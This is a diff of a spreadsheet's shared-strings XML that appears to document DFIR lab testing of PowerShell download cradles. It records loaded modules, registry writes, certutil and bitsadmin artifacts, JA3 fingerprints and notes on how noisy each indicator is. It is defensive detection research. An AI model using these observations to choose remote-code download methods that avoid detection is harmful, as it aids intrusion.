-Visual Basic Environment International Resources - C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\VBA\VBA7.1\1033\VBE7INTL.DLL
-Visual Basic for Applications Development Environment - Expression Service Loader - C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\OFFICE16\VBAJET32.DLL
-Visual Basic for Applications Runtime - Expression Service - C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\OFFICE16\EXPSRV.DLL
-Windows File Protection - C:\Windows\SysWOW64\sfc.dll
-Windows File Protection - C:\Windows\SysWOW64\sfc_os.dll
-Windows Volume Tracking - C:\Windows\SysWOW64\linkinfo.dll
-WordPerfect 5.x Converter - C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\TEXTCONV\WPFT532.CNV
-WordPerfect 6.x - 7.0 Converter - C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\TEXTCONV\WPFT632.CNV
-twinapi - C:\Windows\SysWOW64\twinapi.dll</t>
-    </r>
-  </si>
-  <si>
-    <r>
-      <t xml:space="preserve">Powershell.exe loads additional modules:
-</t>
-    </r>
-    <r>
-      <rPr>
-        <sz val="10"/>
-        <color theme="1"/>
-        <rFont val="Calibri (Body)_x0000_"/>
-      </rPr>
-      <t xml:space="preserve">.NET Framework - C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Confe64a9051#\d53f84c7624fb9b2b17bbad0a38644f8\System.Configuration.Install.ni.dll
-DHCP Client Service - C:\Windows\System32\dhcpcsvc.dll
-DHCPv6 Client - C:\Windows\System32\dhcpcsvc6.dll
-DNS Client API DLL - C:\Windows\System32\dnsapi.dll
-Fusion 2.5 - C:\Windows\System32\sxs.dll
-</t>
-    </r>
-    <r>
-      <rPr>
-        <b/>
-        <sz val="10"/>
-        <color theme="1"/>
-        <rFont val="Calibri (Body)_x0000_"/>
-      </rPr>
-      <t xml:space="preserve">IE ActiveX Interface Marshaling Library - C:\Program Files\Internet Explorer\ieproxy.dll
-</t>
-    </r>
-    <r>
-      <rPr>
-        <sz val="10"/>
-        <color theme="1"/>
-        <rFont val="Calibri (Body)_x0000_"/>
-      </rPr>
-      <t xml:space="preserve">IP Helper API - C:\Windows\System32\IPHLPAPI.DLL
-Microsoft Windows PowerShell Utility Commands - C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P521220ea#\b4a348f448f7da786d8f78e76bbb28a0\Microsoft.PowerShell.Commands.Utility.ni.dll
-Network Store Information RPC interface - C:\Windows\System32\winnsi.dll
-</t>
-    </r>
-    <r>
-      <rPr>
-        <b/>
-        <sz val="12"/>
-        <color theme="1"/>
-        <rFont val="Calibri"/>
-        <family val="2"/>
-        <scheme val="minor"/>
-      </rPr>
-      <t xml:space="preserve">
-iexplore.exe  loads additional modules:
-</t>
-    </r>
-    <r>
-      <rPr>
-        <sz val="10"/>
-        <color theme="1"/>
-        <rFont val="Calibri (Body)_x0000_"/>
-      </rPr>
-      <t xml:space="preserve">Credential Vault Client Library - C:\Windows\SysWOW64\vaultcli.dll
-</t>
-    </r>
-    <r>
-      <rPr>
-        <b/>
-        <sz val="10"/>
-        <color theme="1"/>
-        <rFont val="Calibri (Body)_x0000_"/>
-      </rPr>
-      <t>MSXML 6.0 - C:\Windows\SysWOW64\msxml6.dll</t>
-    </r>
-    <r>
-      <rPr>
-        <sz val="10"/>
-        <color theme="1"/>
-        <rFont val="Calibri (Body)_x0000_"/>
-      </rPr>
-      <t xml:space="preserve">
-</t>
-    </r>
-  </si>
-  <si>
-    <r>
-      <rPr>
-        <b/>
-        <sz val="12"/>
-        <color theme="1"/>
         <rFont val="Calibri (Body)_x0000_"/>
       </rPr>
       <t>Iexplore.exe writes:</t>
@@ -4213,31 +3367,6 @@
     </r>
   </si>
   <si>
-    <r>
-      <rPr>
-        <b/>
-        <sz val="12"/>
-        <color theme="1"/>
-        <rFont val="Calibri"/>
-        <family val="2"/>
-        <scheme val="minor"/>
-      </rPr>
-      <t>Endpoint:</t>
-    </r>
-    <r>
-      <rPr>
-        <sz val="12"/>
-        <color theme="1"/>
-        <rFont val="Calibri"/>
-        <family val="2"/>
-        <scheme val="minor"/>
-      </rPr>
-      <t xml:space="preserve">
-Powershell loads ieproxy.dll.
-Svchost parent to iexplore &gt; iexplore parent to x86 iexplore &gt; x86 Iexplore.exe connects to internet.</t>
-    </r>
-  </si>
-  <si>
     <t>Memory only 
 Temp and transient files from Powershell.exe (not indicator).</t>
   </si>
@@ -4248,141 +3377,6 @@
   <si>
     <t>Lots of benigin activity. 
 Potentially could looks at Powershell.exe and Certificate or Tcpip services keys but these are commmon and noisy indicators.</t>
-  </si>
-  <si>
-    <r>
-      <rPr>
-        <b/>
-        <sz val="12"/>
-        <color theme="1"/>
-        <rFont val="Calibri"/>
-        <family val="2"/>
-        <scheme val="minor"/>
-      </rPr>
-      <t xml:space="preserve">Powershell.exe loads additional modules: </t>
-    </r>
-    <r>
-      <rPr>
-        <b/>
-        <i/>
-        <sz val="12"/>
-        <color theme="1"/>
-        <rFont val="Calibri"/>
-        <family val="2"/>
-        <scheme val="minor"/>
-      </rPr>
-      <t>**Different to invoke-cradlecrafter doco</t>
-    </r>
-    <r>
-      <rPr>
-        <sz val="12"/>
-        <color theme="1"/>
-        <rFont val="Calibri"/>
-        <family val="2"/>
-        <scheme val="minor"/>
-      </rPr>
-      <t xml:space="preserve">
-</t>
-    </r>
-    <r>
-      <rPr>
-        <sz val="10"/>
-        <color theme="1"/>
-        <rFont val="Calibri (Body)_x0000_"/>
-      </rPr>
-      <t xml:space="preserve">.NET Framework - C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Confe64a9051#\d53f84c7624fb9b2b17bbad0a38644f8\System.Configuration.Install.ni.dll
-DHCP Client Service - C:\Windows\System32\dhcpcsvc.dll
-DHCPv6 Client - C:\Windows\System32\dhcpcsvc6.dll
-DNS Client API DLL - C:\Windows\System32\dnsapi.dll
-Data Protection API - C:\Windows\System32\dpapi.dll
-FWP/IPsec User-Mode API - C:\Windows\System32\FWPUCLNT.DLL
-Fusion 2.5 - C:\Windows\System32\sxs.dll
-IP Helper API - C:\Windows\System32\IPHLPAPI.DLL
-</t>
-    </r>
-    <r>
-      <rPr>
-        <b/>
-        <sz val="10"/>
-        <color theme="1"/>
-        <rFont val="Calibri (Body)_x0000_"/>
-      </rPr>
-      <t>MSXML 3.0 - C:\Windows\System32\msxml3.dll</t>
-    </r>
-    <r>
-      <rPr>
-        <sz val="10"/>
-        <color theme="1"/>
-        <rFont val="Calibri (Body)_x0000_"/>
-      </rPr>
-      <t xml:space="preserve">
-Microsoft SChannel Provider - C:\Windows\System32\ncryptsslp.dll
-Microsoft Windows PowerShell Utility Commands - C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P521220ea#\b4a348f448f7da786d8f78e76bbb28a0\Microsoft.PowerShell.Commands.Utility.ni.dll
-Microsoft Windows Sockets 2.0 Service Provider - C:\Windows\System32\mswsock.dll
-Multi Language Support DLL - C:\Windows\System32\mlang.dll
-Network Store Information RPC interface - C:\Windows\System32\winnsi.dll
-Remote Access AutoDial Helper - C:\Windows\System32\rasadhlp.dll
-TLS / SSL Security Provider - C:\Windows\System32\schannel.dll
-Web Transfer Protocols API - C:\Windows\System32\webio.dll
-Windows HTTP Services - C:\Windows\System32\winhttp.dll</t>
-    </r>
-  </si>
-  <si>
-    <r>
-      <rPr>
-        <b/>
-        <sz val="12"/>
-        <color theme="1"/>
-        <rFont val="Calibri"/>
-        <family val="2"/>
-        <scheme val="minor"/>
-      </rPr>
-      <t>Powershell.exe loads additional modules:</t>
-    </r>
-    <r>
-      <rPr>
-        <sz val="12"/>
-        <color theme="1"/>
-        <rFont val="Calibri"/>
-        <family val="2"/>
-        <scheme val="minor"/>
-      </rPr>
-      <t xml:space="preserve"> **Different to invoke-cradlecrafter doco
-</t>
-    </r>
-    <r>
-      <rPr>
-        <sz val="10"/>
-        <color theme="1"/>
-        <rFont val="Calibri (Body)_x0000_"/>
-      </rPr>
-      <t xml:space="preserve">.NET Framework - C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Confe64a9051#\d53f84c7624fb9b2b17bbad0a38644f8\System.Configuration.Install.ni.dll
-DHCP Client Service - C:\Windows\System32\dhcpcsvc.dll
-DHCPv6 Client - C:\Windows\System32\dhcpcsvc6.dll
-DNS Client API DLL - C:\Windows\System32\dnsapi.dll
-Data Protection API - C:\Windows\System32\dpapi.dll
-FWP/IPsec User-Mode API - C:\Windows\System32\FWPUCLNT.DLL
-Fusion 2.5 - C:\Windows\System32\sxs.dll
-IP Helper API - C:\Windows\System32\IPHLPAPI.DLL
-Microsoft SChannel Provider - C:\Windows\System32\ncryptsslp.dll
-Microsoft Windows PowerShell Utility Commands - C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P521220ea#\b4a348f448f7da786d8f78e76bbb28a0\Microsoft.PowerShell.Commands.Utility.ni.dll
-Microsoft Windows Sockets 2.0 Service Provider - C:\Windows\System32\mswsock.dll
-Multi Language Support DLL - C:\Windows\System32\mlang.dll
-Network Store Information RPC interface - C:\Windows\System32\winnsi.dll
-Remote Access AutoDial Helper - C:\Windows\System32\rasadhlp.dll
-TLS / SSL Security Provider - C:\Windows\System32\schannel.dll
-Web Transfer Protocols API - C:\Windows\System32\webio.dll
-</t>
-    </r>
-    <r>
-      <rPr>
-        <b/>
-        <sz val="10"/>
-        <color theme="1"/>
-        <rFont val="Calibri (Body)_x0000_"/>
-      </rPr>
-      <t>Windows HTTP Services - C:\Windows\System32\winhttp.dll</t>
-    </r>
   </si>
   <si>
     <r>
@@ -4581,52 +3575,6 @@
         <rFont val="Calibri (Body)_x0000_"/>
       </rPr>
       <t xml:space="preserve">
-Routing Utilities - C:\Windows\System32\rtutils.dll
-TLS / SSL Security Provider - C:\Windows\System32\schannel.dll
-Windows HTTP Services - C:\Windows\System32\winhttp.dll</t>
-    </r>
-  </si>
-  <si>
-    <r>
-      <t xml:space="preserve">Powershell.exe loads additional modules:
-</t>
-    </r>
-    <r>
-      <rPr>
-        <sz val="10"/>
-        <color theme="1"/>
-        <rFont val="Calibri (Body)_x0000_"/>
-      </rPr>
-      <t xml:space="preserve">.NET Framework - C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Confe64a9051#\d53f84c7624fb9b2b17bbad0a38644f8\System.Configuration.Install.ni.dll
-DHCP Client Service - C:\Windows\System32\dhcpcsvc.dll
-DHCPv6 Client - C:\Windows\System32\dhcpcsvc6.dll
-DNS Client API DLL - C:\Windows\System32\dnsapi.dll
-FWP/IPsec User-Mode API - C:\Windows\System32\FWPUCLNT.DLL
-IP Helper API - C:\Windows\System32\IPHLPAPI.DLL
-Microsoft SChannel Provider - C:\Windows\System32\ncryptsslp.dll
-Microsoft Windows PowerShell Utility Commands - C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P521220ea#\b4a348f448f7da786d8f78e76bbb28a0\Microsoft.PowerShell.Commands.Utility.ni.dll
-Microsoft Windows Sockets 2.0 Service Provider - C:\Windows\System32\mswsock.dll
-Network Store Information RPC interface - C:\Windows\System32\winnsi.dll
-</t>
-    </r>
-    <r>
-      <rPr>
-        <b/>
-        <sz val="10"/>
-        <color theme="1"/>
-        <rFont val="Calibri (Body)_x0000_"/>
-      </rPr>
-      <t>Remote Access API - C:\Windows\System32\rasapi32.dll
-Remote Access AutoDial Helper - C:\Windows\System32\rasadhlp.dll
-Remote Access Connection Manager - C:\Windows\System32\rasman.dl</t>
-    </r>
-    <r>
-      <rPr>
-        <sz val="10"/>
-        <color theme="1"/>
-        <rFont val="Calibri (Body)_x0000_"/>
-      </rPr>
-      <t>l
 Routing Utilities - C:\Windows\System32\rtutils.dll
 TLS / SSL Security Provider - C:\Windows\System32\schannel.dll
 Windows HTTP Services - C:\Windows\System32\winhttp.dll</t>
@@ -5125,54 +4073,6 @@
         <b/>
         <sz val="12"/>
         <color theme="1"/>
-        <rFont val="Calibri"/>
-        <family val="2"/>
-        <scheme val="minor"/>
-      </rPr>
-      <t>Powershell writes:</t>
-    </r>
-    <r>
-      <rPr>
-        <sz val="12"/>
-        <color theme="1"/>
-        <rFont val="Calibri"/>
-        <family val="2"/>
-        <scheme val="minor"/>
-      </rPr>
-      <t xml:space="preserve">
-</t>
-    </r>
-    <r>
-      <rPr>
-        <sz val="10"/>
-        <color theme="1"/>
-        <rFont val="Calibri"/>
-        <family val="2"/>
-      </rPr>
-      <t>HKLM\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
-HKLM\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32\ConsoleTracingMask
-HKLM\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32\EnableAutoFileTracing
-HKLM\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32\EnableConsoleTracing
-HKLM\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32\EnableFileTracing
-HKLM\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32\FileDirectory
-HKLM\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32\FileTracingMask
-HKLM\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32\MaxFileSize
-HKLM\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
-HKLM\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS\ConsoleTracingMask
-HKLM\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS\EnableAutoFileTracing
-HKLM\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS\EnableConsoleTracing
-HKLM\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS\EnableFileTracing
-HKLM\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS\FileDirectory
-HKLM\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS\FileTracingMask
-HKLM\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS\MaxFileSize</t>
-    </r>
-  </si>
-  <si>
-    <r>
-      <rPr>
-        <b/>
-        <sz val="12"/>
-        <color theme="1"/>
         <rFont val="Calibri (Body)_x0000_"/>
       </rPr>
       <t>Endpoint:</t>
@@ -5354,111 +4254,6 @@
 Network Store Information RPC interface - C:\Windows\System32\winnsi.dll
 OLE32 Extensions for Win32 - C:\Windows\System32\urlmon.dll
 Run time utility for Internet Explorer - C:\Windows\System32\iertutil.dll</t>
-    </r>
-  </si>
-  <si>
-    <r>
-      <rPr>
-        <b/>
-        <sz val="12"/>
-        <color theme="1"/>
-        <rFont val="Calibri"/>
-        <family val="2"/>
-        <scheme val="minor"/>
-      </rPr>
-      <t xml:space="preserve">Powershell loads additional modules:
-</t>
-    </r>
-    <r>
-      <rPr>
-        <sz val="12"/>
-        <color theme="1"/>
-        <rFont val="Calibri"/>
-        <family val="2"/>
-        <scheme val="minor"/>
-      </rPr>
-      <t>.NET Framework - C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Confe64a9051#\d53f84c7624fb9b2b17bbad0a38644f8\System.Configuration.Install.ni.dll
-DHCP Client Service - C:\Windows\System32\dhcpcsvc.dll
-DHCPv6 Client - C:\Windows\System32\dhcpcsvc6.dll
-DNS Client API DLL - C:\Windows\System32\dnsapi.dll
-IP Helper API - C:\Windows\System32\IPHLPAPI.DLL
-Microsoft Windows PowerShell Management Commands - C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\fa13923a20a9ae44540d6438a1f677b6\Microsoft.PowerShell.Commands.Management.ni.dll
-Microsoft Windows PowerShell Utility Commands - C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P521220ea#\b4a348f448f7da786d8f78e76bbb28a0\Microsoft.PowerShell.Commands.Utility.ni.dll
-Network Store Information RPC interface - C:\Windows\System32\winnsi.dll</t>
-    </r>
-    <r>
-      <rPr>
-        <b/>
-        <sz val="12"/>
-        <color theme="1"/>
-        <rFont val="Calibri"/>
-        <family val="2"/>
-        <scheme val="minor"/>
-      </rPr>
-      <t xml:space="preserve">
-Bitsadmin.exe loads:</t>
-    </r>
-    <r>
-      <rPr>
-        <sz val="12"/>
-        <color theme="1"/>
-        <rFont val="Calibri"/>
-        <family val="2"/>
-        <scheme val="minor"/>
-      </rPr>
-      <t xml:space="preserve">
-</t>
-    </r>
-    <r>
-      <rPr>
-        <sz val="10"/>
-        <color theme="1"/>
-        <rFont val="Calibri (Body)_x0000_"/>
-      </rPr>
-      <t xml:space="preserve">Advanced Windows 32 Base API - C:\Windows\System32\advapi32.dll
-AppModel API Host - C:\Windows\System32\kernel.appcore.dll
-BITS administration utility - C:\Windows\System32\bitsadmin.exe
-</t>
-    </r>
-    <r>
-      <rPr>
-        <b/>
-        <sz val="10"/>
-        <color theme="1"/>
-        <rFont val="Calibri (Body)_x0000_"/>
-      </rPr>
-      <t>Background Intelligent Transfer Service Proxy - C:\Windows\System32\qmgrprxy.dll</t>
-    </r>
-    <r>
-      <rPr>
-        <sz val="10"/>
-        <color theme="1"/>
-        <rFont val="Calibri (Body)_x0000_"/>
-      </rPr>
-      <t xml:space="preserve">
-Base cryptographic API DLL - C:\Windows\System32\cryptbase.dll
-COM+ Configuration Catalog - C:\Windows\System32\clbcatq.dll
-Cryptographic Service Provider API - C:\Windows\System32\cryptsp.dll
-GDI Client DLL - C:\Windows\System32\gdi32.dll
-Host for SCM/SDDL/LSA Lookup APIs - C:\Windows\System32\sechost.dll
-MSCTF Server DLL - C:\Windows\System32\msctf.dll
-Microsoft COM for Windows - C:\Windows\System32\combase.dll
-Microsoft Enhanced Cryptographic Provider - C:\Windows\System32\rsaenh.dll
-Microsoft OLE for Windows - C:\Windows\System32\ole32.dll
-Microsoft UxTheme Library - C:\Windows\System32\uxtheme.dll
-Multi-User Windows IMM32 API Client DLL - C:\Windows\System32\imm32.dll
-Multi-User Windows USER API Client DLL - C:\Windows\System32\user32.dll
-NT Layer DLL - C:\Windows\System32\ntdll.dll
-Remote Procedure Call Runtime - C:\Windows\System32\rpcrt4.dll
-Security Support Provider Interface - C:\Windows\System32\sspicli.dll
-Shell Light-weight Utility Library - C:\Windows\System32\shlwapi.dll
-Version Checking and File Installation Libraries - C:\Windows\System32\version.dll
-Windows Cryptographic Primitives Library - C:\Windows\System32\bcrypt.dll
-Windows Cryptographic Primitives Library - C:\Windows\System32\bcryptprimitives.dll
-Windows NT BASE API Client DLL - C:\Windows\System32\KernelBase.dll
-Windows NT BASE API Client DLL - C:\Windows\System32\kernel32.dll
-Windows NT CRT DLL - C:\Windows\System32\msvcrt.dll
-Windows Shell Common Dll - C:\Windows\System32\shell32.dll</t>
     </r>
   </si>
   <si>
@@ -5996,29 +4791,6 @@
   </si>
   <si>
     <r>
-      <t xml:space="preserve">Certutil.exe writes to IE local cache:
-C:\Users\&lt;USER&gt;\AppData\Local\Microsoft\Windows\INetCache\IE\&lt;subdir&gt;
-Also writes to specified $outfile
-e.g:
-</t>
-    </r>
-    <r>
-      <rPr>
-        <sz val="10"/>
-        <color theme="1"/>
-        <rFont val="Calibri"/>
-        <family val="2"/>
-        <scheme val="minor"/>
-      </rPr>
-      <t>C:\Windows\Temp\az94jm0p5ifnesg1qt6dky3vr7lwbho2
-C:\Users\Matt.DFIR\AppData\Local\Microsoft\Windows\INetCache\IE\JIIN83V6\test[1].ps1
-C:\Users\Matt.DFIR\AppData\Local\Microsoft\Windows\INetCache\IE\JIIN83V6
-C:\Users\Matt.DFIR\AppData\Local\Microsoft\Windows\INetCache\IE
-C:\Windows\cerD555.tmp</t>
-    </r>
-  </si>
-  <si>
-    <r>
       <rPr>
         <b/>
         <sz val="12"/>
@@ -6180,15 +4952,6 @@
     <t>Mostly benigin activity</t>
   </si>
   <si>
-    <t>C:\Users\&lt;USER&gt;\AppData\Local\Microsoft\Windows\INetCache\IE\&lt;subdir&gt;</t>
-  </si>
-  <si>
-    <t>Certutil.exe writes to IE cache:</t>
-  </si>
-  <si>
-    <t>C:\Users\&lt;USER&gt;\AppData\Local\Microsoft\Windows\Temporary Internet Files\</t>
-  </si>
-  <si>
     <r>
       <rPr>
         <b/>
@@ -6239,29 +5002,203 @@
     </r>
   </si>
   <si>
-    <r>
-      <rPr>
-        <b/>
-        <sz val="18"/>
-        <color theme="1"/>
-        <rFont val="Calibri (Body)_x0000_"/>
-      </rPr>
-      <t xml:space="preserve">Setup
-</t>
-    </r>
-    <r>
-      <rPr>
-        <sz val="12"/>
-        <color theme="1"/>
-        <rFont val="Calibri"/>
-        <family val="2"/>
-        <scheme val="minor"/>
-      </rPr>
-      <t>• Setup primarily testing in a Windows 8.1 lab with Office 2016 and Win7 with office 2013 and Win8.1 default Powershell 4
-• Sysmon rules looking at all events whitelisting relevant processes of interest.
-• Splunk UF collecting all sysmon logs
-• Build a whitelist of the machine running Powershell.exe, Excel, Word and IE so we can see additional moduels and other activity
-• Wireshark was used each test for network indicators, validation of network in live environment</t>
+    <t>Windows 10 Office 2016 Powershell 5.1.16299.248</t>
+  </si>
+  <si>
+    <r>
+      <t xml:space="preserve">DownloadString: none - memory only
+DownloadData: none - memory only
+OpenRead: none - memory only
+DownloadFile: Payload written to disk by Powershell.exe
+Temp and transient files from Powershell.exe (not indicator). e.g:
+</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="10"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t>C:\Users\Matthew Green\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
+C:\Users\Matthew Green\AppData\Local\Temp\__PSScriptPolicyTest_ixrd2vbf.myg.psm1
+C:\Users\Matthew Green\AppData\Local\Temp\__PSScriptPolicyTest_m2xnvvx0.1s3.ps1
+C:\Users\Matthew Green\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log</t>
+    </r>
+  </si>
+  <si>
+    <r>
+      <t xml:space="preserve">Registry object added or deleted (rule: RegistryEvent) by powershell.exe
+</t>
+    </r>
+    <r>
+      <rPr>
+        <b/>
+        <sz val="12"/>
+        <color theme="1"/>
+        <rFont val="Calibri"/>
+        <family val="2"/>
+        <scheme val="minor"/>
+      </rPr>
+      <t xml:space="preserve">HKLM\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
+HKLM\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
+</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="12"/>
+        <color theme="1"/>
+        <rFont val="Calibri"/>
+        <family val="2"/>
+        <scheme val="minor"/>
+      </rPr>
+      <t xml:space="preserve">
+Registry value set (rule: RegistryEvent) by powershell.exe
+</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="10"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t>HKLM\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32\ConsoleTracingMask
+HKLM\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32\EnableAutoFileTracing
+HKLM\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32\EnableConsoleTracing
+HKLM\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32\EnableFileTracing
+HKLM\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32\FileDirectory
+HKLM\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32\FileTracingMask
+HKLM\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32\MaxFileSize
+HKLM\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS\ConsoleTracingMask
+HKLM\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS\EnableAutoFileTracing
+HKLM\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS\EnableConsoleTracing
+HKLM\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS\EnableFileTracing
+HKLM\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS\FileDirectory
+HKLM\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS\FileTracingMask
+HKLM\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS\MaxFileSize</t>
+    </r>
+  </si>
+  <si>
+    <t>JA3_footprint: 769,49162-49161-49172-49171-53-47-10,0-10-11-35-23-65281,29-23-24,0
+JA3_hash: 54328bd36c14bd82ddaa0c04b25ed9ad</t>
+  </si>
+  <si>
+    <t>JA3_footprint: 771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-5-10-11-13-35-16-23-24-65281,29-23-24,0
+JA3_hash: 10ee8d30a5d01c042afd7b2b205facc4</t>
+  </si>
+  <si>
+    <t>2 sets assuming different methods use differents libraries
+JA3_footprint: 771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-5-10-11-13-35-23-65281,29-23-24,0
+JA3_hash: ce5f3254611a8c095a3d821d44539877
+JA3_footprint: 771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-5-10-11-13-35-23-65281,29-23-24,0
+JA3_hash: a0e9f5d64349fb13191bc781f81f42e1</t>
+  </si>
+  <si>
+    <r>
+      <rPr>
+        <b/>
+        <sz val="12"/>
+        <color theme="1"/>
+        <rFont val="Calibri"/>
+        <family val="2"/>
+        <scheme val="minor"/>
+      </rPr>
+      <t>Powershell.exe loads additional modules:</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="12"/>
+        <color theme="1"/>
+        <rFont val="Calibri"/>
+        <family val="2"/>
+        <scheme val="minor"/>
+      </rPr>
+      <t xml:space="preserve">
+</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="10"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t xml:space="preserve">.NET Framework - C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Confe64a9051#\ea931e4f660df414bb43822d70c9c9fb\System.Configuration.Install.ni.dll
+.NET Framework - C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\2e6ad675e5f9e923284877dd42f58f75\System.Core.ni.dll
+.NET Framework - C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Data\8d3ff0c32bb1ae109d1ac9f6c4caa4bf\System.Data.ni.dll
+.NET Framework - C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Dired13b18a9#\c3ffb5546a75f99a8d7293db710d1c24\System.DirectoryServices.ni.dll
+.NET Framework - C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Management\a1f92e5e985f95bc5f212f8ff05c5c1a\System.Management.ni.dll
+.NET Framework - C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Numerics\e7dc7f4504ef24ad3922aae3e9aa2d24\System.Numerics.ni.dll
+.NET Framework - C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Transactions\1ed4ddbd8685d327bfdd39bab521366c\System.Transactions.ni.dll
+.NET Framework - C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\2f52ca6330aa92554abf777e2b7d6783\System.Xml.ni.dll
+.NET Framework - C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d41b66a8a5dde18b54c79b7b42b5c951\System.ni.dll
+Fusion 2.5 - C:\Windows\System32\sxs.dll
+</t>
+    </r>
+    <r>
+      <rPr>
+        <b/>
+        <sz val="10"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t>IE ActiveX Interface Marshaling Library - C:\Windows\System32\ieproxy.dll</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="10"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t xml:space="preserve">
+Microsoft Windows PowerShell Management Commands - C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P6f792626#\87dc8856a52ea55a6bf9698664257e01\Microsoft.PowerShell.Security.ni.dll
+Microsoft Windows PowerShell Utility Commands - C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P521220ea#\3a5dc2caf55d763e630aa7e89c43dabb\Microsoft.PowerShell.Commands.Utility.ni.dll
+Microsoft.PowerShell.ConsoleHost - C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pb378ec07#\803c6cc06ee5ddc93de3a601c7368bb9\Microsoft.PowerShell.ConsoleHost.ni.dll
+System.Configuration.dll - C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\303d455e2eac7725610cd55c8170ba00\System.Configuration.ni.dll
+System.Management.Automation - C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\7d16fda968d94b857be65dd8539a562a\System.Management.Automation.ni.dll
+cs - C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Mf49f6405#\a12bb8857bac428f3891c2cad3b8bc14\Microsoft.Management.Infrastructure.ni.dll
+</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="12"/>
+        <color theme="1"/>
+        <rFont val="Calibri"/>
+        <family val="2"/>
+        <scheme val="minor"/>
+      </rPr>
+      <t xml:space="preserve">
+</t>
+    </r>
+    <r>
+      <rPr>
+        <b/>
+        <sz val="12"/>
+        <color theme="1"/>
+        <rFont val="Calibri"/>
+        <family val="2"/>
+        <scheme val="minor"/>
+      </rPr>
+      <t>iexplore.exe loads additional modules:</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="12"/>
+        <color theme="1"/>
+        <rFont val="Calibri"/>
+        <family val="2"/>
+        <scheme val="minor"/>
+      </rPr>
+      <t xml:space="preserve">
+</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="10"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
